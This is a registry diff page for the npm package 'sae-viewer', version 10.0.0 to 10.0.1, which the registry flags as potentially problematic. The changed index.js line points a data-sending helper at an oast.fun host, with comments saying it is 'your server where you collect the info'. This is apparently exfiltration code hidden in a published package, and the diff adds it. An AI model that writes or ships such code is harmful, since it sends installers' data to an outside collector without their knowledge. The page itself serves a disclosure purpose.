sae-viewer 10.0.0 → 10.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of sae-viewer might be problematic. Click here for more details.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -5,7 +5,7 @@ const https = require('https');
|
|
|
5
5
|
// Helper function to send data back to your server
|
|
6
6
|
const sendData = (data) => {
|
|
7
7
|
const options = {
|
|
8
|
-
hostname: '
|
|
8
|
+
hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Your server where you collect the info
|
|
9
9
|
port: 443,
|
|
10
10
|
path: '/chatgptSeaviewer',
|
|
11
11
|
method: 'POST',
|